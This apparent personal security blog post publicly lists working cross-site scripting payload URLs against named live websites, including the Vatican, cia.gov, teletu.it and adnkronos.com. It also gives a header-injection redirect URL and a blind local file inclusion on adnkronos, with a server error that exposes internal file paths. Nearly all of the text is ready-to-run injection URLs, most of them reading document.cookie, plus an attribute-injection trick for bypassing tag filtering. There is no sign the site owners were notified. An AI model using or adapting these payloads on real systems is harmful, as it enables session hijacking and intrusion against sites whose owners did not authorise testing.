pro(re)gress

Yes, it could be done. More informations soon on this blog. (remember ... no defacements, no data retrieval, no bad things) Meanwhile I've found this simple xss (put an xss in any text box) http://asv.vatican.va/cercait/index.php?advanced=1  "><video src=1 onerror=alert(document.cookie)> Anyway, I'm playing on something else that is more interesting.

xss in quite all the pages --------------------------OLD----------------------- http://www.gossipnews.it/cinema/vedifoto.php?id=3cbd57ad5223375ca2a5089283966818&num=19%3Cscript%3Ealert(document.cookie);%3C/script%3E& http://www.gossipnews.it/musica/gli_zero_assoluto_fotorw.html?id=5ccabcbfb5861ba35a6b271c76a5ade0&num=5%3Cscript%3Ealert(document.cookie);%3C/script%3E%3C%22 any location - http header injection http://www.gossipnews.it/open/www/delivery/ck.php?oaparams=2__bannerid=537__zoneid=50__cb=1812239d6e__oadest=http%3A%2F%2Fwww.google.com --------------------------------------NEW ------------------------------- http://www.gossip.it/news/monografia.php?keyword=ssasdadas"><script>alert(1);</script>

http://supporto.teletu.it/cerca/?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&search=1 any xss in the forms http://www.teletu.it/teletu/nuova-linea.php http://www.teletu.it/tuttocompreso/offerte/tutto-per-te.php

http://cerca.webnews.it/w.sl?us=fs&q=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E%3C%22&t=webnews&cat=

The <> tags are not allowed but the "= can be injected so we can add to the  <input> tag a style to enlarge the area and an onmouseover so that a javascript will be fired when the mouse pass over the (enlarged) text input. We can do also other things but this should be enough. https://www.cia.gov/search?q=%22%20style%3d%22height:900px;%22%20onMouseOver%3d%22alert(document.cookie) Screenshot

XSS modifies the script within the setTimeout (works after 300000 ms) http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie+' http://www.adnkronos.com/IGN/Zoom/?id=3.0.4217592951');alert(document.cookie);",1);setTimeout("alert(' Local File Inclusion the same problem is identical in several parts of the website even if blind (no error in the output). http://www.adnkronos.com/IGN/Zoom/?id= sample error (added a ' ) Warning: include(news/3.0.4217592951\'.inc.php) [function.include]: failed to open stream: No such file or directory in /opt/apache2/www60/IGN/Zoom/index.php on line 11 Warning: include() [function.include]: Failed opening 'news/3.0.4217592951\'.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /opt/apache2/www60/IGN/Zoom/index.php on line 11 The error doesn't always appear. Probably the response is from different servers and only one of those is  showing the...

Several XSS all over the website (more than the listed). samples (xss after the id or the page will redirect) http://php.opensourcecms.com/scripts/details.php?scriptid=339%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3Cval=&name=Mac's%20CMS http://php.opensourcecms.com/scripts/show.php?catid=1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&cat=CMS%20/%20Portals http://php.opensourcecms.com/news/index.php?page=2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&sortby=dateasc http://php.opensourcecms.com/scripts/details.php?scriptid=19%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C&name=e107    sample on tradepub.com closing the comment in the html http://php-opensourcecms.tradepub.com/?pt=cat&page=Cons--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E%3C!--  there are several other.